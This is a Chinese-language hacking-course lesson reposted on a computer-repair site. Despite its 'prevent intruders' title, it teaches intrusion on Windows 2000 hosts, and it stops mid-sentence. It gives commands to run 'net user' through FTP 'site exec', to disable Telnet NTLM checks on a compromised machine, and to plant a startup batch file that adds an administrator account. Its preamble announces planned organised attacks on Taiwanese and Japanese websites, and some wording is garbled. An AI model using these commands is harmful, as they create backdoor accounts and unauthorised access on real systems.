简单的入侵方法防止入侵者-菜鸟教程-福州电脑维修|上门维修维护|包年电脑维修|IT外包

简单的入侵方法防止入侵者

课前强调的几个问题：
一，严酷服从以下规律：
详细规则（试行）：
1.任何时间不许谈政治，网络纠纷，色情及不文明用语。
2.授课期间只准私聊，不可以发言。每讲一节，会偶然间留给你们反应本节不懂内容。
3.认真听讲，对重复问题不与回答。
4.不可以嘲笑佳宾，管理员，及其他一些基础较差的朋友。
5.不允许VIP私自将课本转发给非会员，一经发现将取消VIP资历。
6.讲堂中颁布的有毛病网站，未经允许，不允许添加，删除，更改网站中任何内容。
二，关于找软件保举http://www.chinesehack.org
三，最好的老师便是搜索，http://www.google.com http://www.baidu.com
四，对于本站的vip，可以在论坛的vip专区获得课本，其他朋友可以打开记事本做一下条记，只需复制你必要的就可以了。课后，菜鸟应该总结和自我整理一下条记，最好能将心得写下来，发表在论坛上，要是任命将获得vip身份。
五，我们网站初建，百废待兴。欢迎大家积极参加我们，一同营建一个好的学习氛围，配合前进。但是，请不要用学到的一点皮毛随处黑网站，更不要借918x的名义做任何事。
六，盼望大家高兴成为vip，我们即将创建918技术同盟，计划来岁9月15日---9月18日，对台湾，日本等网站有构造的展开行动。
第一章 win2000我们必须知道的几点
一什么是shell?
人机交互的界面。
shell是有权限差异的。最高权限--管理员权限才是我们的目的。以是偶然会有提拔权限的问题。
有了shell还要扩展它，便是进一步获得更好用的shell。命令行的到图形的、功能少的到多的。于是才有了“怎样开3389”，“怎样上传”之类问题。
二 cmd.exe ftp.exe telnet.exe 3大系统文件
1 cmd.exe 2000下：c:\winnt\system32\cmd.exe xp下：c:\windows\system32\
cmd.exe的功能及其强大，远远超过了98的command.com，而且cmd.exe还可以或许实现99%的在图形界面下的功能。以是一旦取得cmd.exe的控制权就可以或许掌握整个系统。Cmd一般代指shell，可以执行其外部的命令和外部命令，从而获得控制权。命令都有本身的参数来不同的必要。
cmd.exe 是有毛病的：“cmd.exe超长路径名缓冲溢出/DoS缺陷”
2 ftp.exe，默许端口：21。我们一直在讲的serv-u是一个ftp办事段的软件，而客户段便是我们机子上的ftp.exe，他的命令参数很多。“FTP命令全集”。
他主要的作用是用来上传下载的。由于命令复杂，利用不方便，以是我们现在用软件来取代他，如cuteftp ,flashfxp。
这里我主要说明一下ftp的一个大家知道很少的命令：
当你获得ftp办事器的管理员密码后，是可以远程执行命令的，如：
C:\>ftp 111.111.111.111 21
User (111.111.111.111:(none)): 918x
331 User name okay, need password.
Password:民主***
ftp>quote site exec net user xr rain /add ‘我们添加了一个用户
[本领]ftp>quote site exec 你要执行的命令
3 telnet.exe 默许端口：23。Telnet协议是TCP/IP协议族中的一员，是Internet远程登陆办事的尺度协议。使用Telnet协议可以或许把当地用户所利用的盘算机酿成远程主机系统的一个终端。
简单来说，我们远程登陆了telnet就获得了一个shell。对于unix来说，他也有telnet，但是它用明文来传送密码。以是它的宁静的替代步伐是OpenSSH。
开启telnet办事，我们这样：net start telnet(封闭为 net stop telnet)
在对win2000的telnet来说，我们扳连到一个工具，NTLM验证。简单来说，便是一个限定远程登陆的机制，默许是必要NTLM验证的，以是我们必要封闭他。
HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\TELNETSERVER\1.0下的NTLM键值默许是2。（NTML认证方法 0：开启telnet时去掉NTLM验证 1：先举行验证，验证失败就用用户名和密码登陆 2：开启NTML验证）
我们可以上传并运行小容的ntml.exe来使严正失效。
在没有办法上传的情况下，我这里提供一个很通用的办法，其他的办法大家可以本身在网上找到的：
⑴ 得到肉鸡的用户名和密码当前（也可以本身创建一个），在本身的机器上创建一个一样的用户和密码
⑵ 在WINNT\system32中找到cmd.exe,创建桌面快捷图标，在快捷中点右键-属性-选“以其他身份运行”-然后以你创建的用户名和密码运行。
然后，我们就可以远程连接：在cmd下 telnet ip 端口（23）了。
三，了解vbs ,vbe ,bat
1 vbs,vbe. VBS文件是用VB Script编写而成，该脚本语言功能非常强大，它们利用Windows系统的开放性特点，通过调用一些现成的Windows对象、组件，可以直接对文件系统、注册表等举行控制，功能非常强大。以是一些病毒的代码是vbs的。
他和VB，ASP同等出一则，也便是说会一种其他的天然就能编写了。
提供一个vbs的教程地址：大家有兴味去看：http://www.zjol.com.cn/vbbible/software/program/VBSdocs/VBSTUTOR.HTM
2 bat 便是我们所说的批处置惩罚。简单的说便是可以一次运行多个命令的命令聚集。
他在整个hack历程中是个非常好的打击思绪的。比如在asp提拔权限的研究里，默许系统下C:\Documents and Settings\All Users\下是可写的，我们可以添加如下bat文件在主机重启后，可获得一个管理用户：C:\Documents and Settings\All Users\「开始」菜单\步伐\启动\1.bat
1.bat 的内容是：
net user xr rain /add ‘（这就添加了一个用户名为xr，密码为rain的用户）
net localgroup administrators xr /add ‘（把xr添加为管理员）
再提供一个重启的bat文件，可以在Windows所有系统下实用。
@echo off
echo welcome to http://www.918x.com
setlocal
cd/d %temp%
echo [version] > reboot.inf
set inf=InstallHinfSection DefaultInstall
echo signature=$chicago$ >> reboot.inf
echo [defaultinstall] >> reboot.inf
rundll32 setupapi,%inf% 1 %temp%\reboot.inf
del reboot.inf
四，几个紧张的cmd下的命令
1． Echo 写文本的命令大家打开你们的cmd，如下：
C:\>echo 11111111>1.txt
C:\>echo 222222>>1.txt (注意：这里是>>，要是用的是>，那么后面的11111内容将被笼罩。)
再看看C盘是不是多了一个1.txt，好了，大家经常看教程，我就未几说了。能被echo的文件范例很多，但都应该是文本范例，如：txt,htm,asp,php,vbs,bat,inf
要注意的是：当你要echo的内容中包括<>这两个字符时，记得后面要加上字符^。如：
Echo ^